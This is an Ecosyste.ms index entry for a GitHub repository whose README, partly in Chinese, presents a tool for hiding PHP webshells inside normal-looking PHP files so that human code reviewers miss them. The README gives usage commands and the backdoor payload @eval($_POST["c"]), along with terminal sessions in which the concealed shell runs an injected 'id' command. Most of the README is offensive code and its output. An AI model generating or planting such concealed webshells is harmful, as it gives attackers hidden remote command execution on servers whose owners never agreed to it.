Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/Macr0phag3/webshell-bypassed-human
过人 webshell 的生成工具
https://github.com/Macr0phag3/webshell-bypassed-human
Last synced: 21 days ago
JSON representation
过人 webshell 的生成工具
- Host: GitHub
- URL: https://github.com/Macr0phag3/webshell-bypassed-human
- Owner: Macr0phag3
- License: apache-2.0
- Created: 2020-06-29T06:19:06.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2021-12-24T08:18:39.000Z (almost 3 years ago)
- Last Synced: 2024-08-05T17:43:29.379Z (4 months ago)
- Language: PHP
- Size: 18.6 KB
- Stars: 251
- Watchers: 8
- Forks: 38
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
- awesome-hacking-lists - Macr0phag3/webshell-bypassed-human - 过人 webshell 的生成工具 (PHP)
README
# webshell-bypassed-human
见公众号文章:[传送门](https://mp.weixin.qq.com/s?__biz=MzI3OTE4MTU5Mw==&mid=2247483933&idx=1&sn=94c10672d664ae84e233792c09231a47&chksm=eb4ae26bdc3d6b7d0ffc09f9c64ac081e4e2af2d629927321d531b37a86a6333a5635fdf6a16&scene=0&xtrack=1#rd)
,或者见 fb 文章 https://www.freebuf.com/articles/web/241454.html过人 webshell 的生成工具
```shell
» python hide_webshell.py
usage: hide_webshell.py [-h] -pf PAYLOAD_FILE [--pro] [-wf WEBSHELL_FILE]
[--debug]
php
hide_webshell.py: error: the following arguments are required: php, -pf/--payload_file
```将 payload 放在 `-pf` 所指定的路径
## hide webshell
示例:`python hide_webshell.py hide_webshell.py normal.php -pf payload.txt`
## hide webshell pro
示例:`python hide_webshell.py normal_pro.php -pf payload.txt --pro`
## payload 示例
- `system("echo \"hacked by Tr0y :)\"");`
- `@eval($_POST["c"]);`## 完整示例
```
# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:27]
» cat payload.txt
system("echo \"hacked by Tr0y :)\"");%# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:28]
» p hide_webshell.py normal.php -pf payload.txt && php webshell_hidden.php
[+] Hide webshell in normal mode
[-] Get payload from payload.txt
Payload is system("echo \"hacked by Tr0y :)\"");
[-] Get php code from normal.php
[!] Saved webshell as webshell_hidden.php
[!] All doneBye :)
hacked by Tr0y :)# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:31]
» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php webshell_hidden.php
[+] Hide webshell in pro mode
[-] Get payload from payload.txt
Payload is system("echo \"hacked by Tr0y :)\"");
[-] Get php code from normal_pro.php
[!] Saved webshell as webshell_hidden.php
[!] All doneBye :)
hacked by Tr0y :)# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:23]
» cat payload.txt
@eval($_POST["c"]);%# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:24]
» p hide_webshell.py normal.php -pf payload.txt && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'
[+] Hide webshell in normal mode
[-] Get payload from payload.txt
Payload is @eval($_POST["c"]);
[-] Get php code from normal.php
[!] Saved webshell as webshell_hidden.php
[!] All doneBye :)
uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:26]
» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'
[+] Hide webshell in pro mode
[-] Get payload from payload.txt
Payload is @eval($_POST["c"]);
[-] Get php code from normal_pro.php
[!] Saved webshell as webshell_hidden.php
[!] All doneBye :)
uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略
```## 其他
[![Stargazers over time](https://starchart.cc/Macr0phag3/webshell-bypassed-human.svg)](https://starchart.cc/Macr0phag3/webshell-bypassed-human)